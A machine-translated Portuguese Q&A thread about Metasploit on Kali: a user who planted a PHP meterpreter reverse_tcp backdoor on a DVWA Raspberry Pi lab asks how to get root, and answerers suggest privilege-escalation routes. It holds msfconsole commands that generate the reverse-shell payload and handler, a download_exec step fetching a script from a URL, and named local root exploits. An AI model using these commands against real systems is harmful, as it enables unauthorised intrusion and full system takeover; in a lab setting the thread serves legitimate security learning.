it-swarm-pt.tech

MSFConsole / Kali Linux - obtenha acesso root ao sistema unix

Estou brincando com o Kali Linux, MSFConsole e DVWA (Damn Vulnerable Web Application).

Consegui entrar com sucesso no sistema (Raspberry Pi) criando um backdoor PHP PHP e enviando-o via injeção SQL.

Agora eu tenho acesso ao sistema, o único problema é que eu estou executando como www-data (não seria bom se tornar root para criar sua própria conta de superusuário ?!) É possível, de alguma forma, aumentar o privilégio no Linux (Raspbaian) usando MSFConsole, BASH (do backdoor) ou de outra maneira?

Tentei executar "use priv" no prompt do meterpreter, mas o erro que recebi foi 'Falha ao carregar a extensão: nenhum módulo com o nome ext_server_priv.php encontrado'. Se ajudar, estou executando o exploit reverse_tcp como um script PHP.

Consegui comprometer o sistema executando este é Msfconsole

use php/meterpreter/reverse_tcp
set LHOST <my IP>
generate -t raw -f hackme.php
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST <my IP>
exploit

Em seguida, carreguei o hackme.php no servidor da Web através do upload inseguro de arquivos, depois de fazer isso, naveguei até o arquivo carregado.

O crédito vai para este vídeo por me fornecer o código acima. (Eu tive que usar a função generate em vez de msfpayload porque essa funcionalidade foi movida devido a sua obsoleta.)

9
iProgram

Nesse ponto, você alcançou o básico de um compromisso no sistema e está na fase dois comum de exploração, que é a escalada de privilégios.

Exatamente como você pode conseguir isso depende muito do sistema em questão, qual código está instalado e como está configurado. Algumas opções para procurar coisas para obter escalação de privilégios em um sistema Linux

  • Binários raiz SetUID que podem ser gravados pelo usuário no qual você está executando. se você puder encontrar algo que possa sobrescrever que, quando executado, será executado como root, use-o para aumentar seus privilégios.
  • Vulnerabilidades nos serviços do sistema em execução como raiz. Isso provavelmente dependerá do status do patch do sistema em que você está executando.

Outras coisas que se aplicam mais em testes de segurança "do mundo real", mas que dificilmente se aplicam à sua situação

  • Credenciais expostas em arquivos no sistema. Essa pode ser uma maneira comum de explorar sistemas.
  • Ataques de adivinhação de senha. Adivinhar credenciais é uma boa maneira de obter acesso adicional
  • Pivotando do seu sistema atacado para outro na mesma rede. Normalmente, uma vez que um invasor se posiciona em uma rede, ele procura outros sistemas que podem ter configurações intermediárias adicionais que podem ser exploradas.
6
Rory McCune

De acordo com a documentação da metasploit, o user priv é um módulo disponível apenas para o meterpreter nativo do Windows (não para outros metros).

Você provavelmente deseja examinar a escalação de privilégios unix, que eu não conheço. Não acredito que exista um módulo automatizado para metasploit que faria isso ...

Boa sorte ;)

1
RedPanda

Você pode atualizar seu Shell para um Meterpreter com sessões -u <#> e executar os módulos post (por exemplo, post/multi/recon/local_exploit_suggester) ou também pode fazer uma sessão existente (Meterpreter ou não) e executar uma escalação de privilégios local explore, por exemplo, udev_netlink, sock_sendpage, et al, configurando a variável SESSION.

Alguns módulos variam de acordo com o sistema operacional ou o cenário, outros são difíceis de encontrar na hierarquia de metasploit-framework. Tente o seguinte dentro do meterpreter:

mostrar post

executar postagem/multi/<tab><tab>

executar post/linux/<tab><tab>

execute exploit/multi/<tab><tab>

Você também pode executar uma variedade de ferramentas de escalação de privilégios fora da estrutura de metasploit e ativá-las em sua sessão. Aqui estão dois módulos que ajudam nesse empreendimento:

use post/multi/gather/multi_command

definir RESOURCE cmds.rc

use post/linux/manage/download_exec

definir URL http://10.0.0.1/cmds.sh

Sugiro que você prepare um sistema em um laboratório que corresponda às qualidades do seu sistema de destino, por exemplo, mesmo sistema operacional, nível de patch, instaláveis, definições de configuração, etc. Ao manter o acesso raiz neste destino de laboratório com mock-up, você pode recriar o que tentará fazer no destino real. Muitas ferramentas de escalonamento de privilégios requerem acesso root para executá-las corretamente, por exemplo, Nessus e OpenVAS no modo credenciado, CIS-CAT, ovaldi, cvechecker, lynis, unix-privesc-check e enum4linux são ótimas ferramentas neste espaço. Outros terão que ser executados apenas no sistema de destino real, como sucrack ou phrasendrescher. Alguns ataques de escalonamento de privilégios requerem muito mais planejamento, como a exploração de binários setuid/setgid customizadas . O RPi provavelmente exigirá um compilador cruzado para explorações, e muitos podem nem funcionar, a menos que você altere os deslocamentos para trabalhar com os registradores, opcodes e endianness da plataforma ARM.

1
atdre